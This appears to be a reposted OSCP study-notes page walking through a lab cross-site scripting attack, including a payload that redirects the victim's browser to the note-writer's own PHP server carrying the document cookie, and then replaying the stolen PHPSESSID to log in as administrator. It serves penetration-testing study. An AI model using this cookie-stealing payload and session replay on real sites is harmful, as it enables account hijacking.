首页 > 移动平台 > 详细

OSCP Learning Notes - WebApp Exploitation(2)

时间:2019-07-18 23:59:09      阅读:169      评论:0      收藏:0      [点我收藏+]

Cross-Site Scripting(XSS)

 1. Using the tool - netdiscover to find the IP of target server.

netdiscover

技术分享图片

2.Browser the website http://10.0.0.21 through Firefox.

技术分享图片

3. Click ‘Test‘ . Then write the following script in the text box. 

<script>alter(‘XSS‘)</script>

 

技术分享图片

 

 技术分享图片

4.Create the index.php in the root folder.

<?php
$cookie = isset($_GET["test"])?$_GET[‘test‘]:"";
?>

技术分享图片

5. Start the php service.

service apache2 stop
php -S 10.0.0.109:80

技术分享图片

6. Write the following script in the text box, then click the "Submit Query" button.

<script>location.href=‘http://10.0.0.109/index.php?test=‘+document.cookie;</script>

技术分享图片

技术分享图片

 7. Install the Cookie Manager on the Firefox.

技术分享图片

 8. Edit the PHPSESSID value in the Cookies Manager tool and change the value to the PHPSESSID showed in Kali Linux terminal. Then save the cookie value.

技术分享图片

 

9. After change the cookie value - PHPSESSID. Click the ‘Admin‘ buttion, then you can login without username and password. You obtain the administrator privileges.

技术分享图片

 

 

技术分享图片

 

OSCP Learning Notes - WebApp Exploitation(2)

原文:https://www.cnblogs.com/keepmoving1113/p/11210706.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!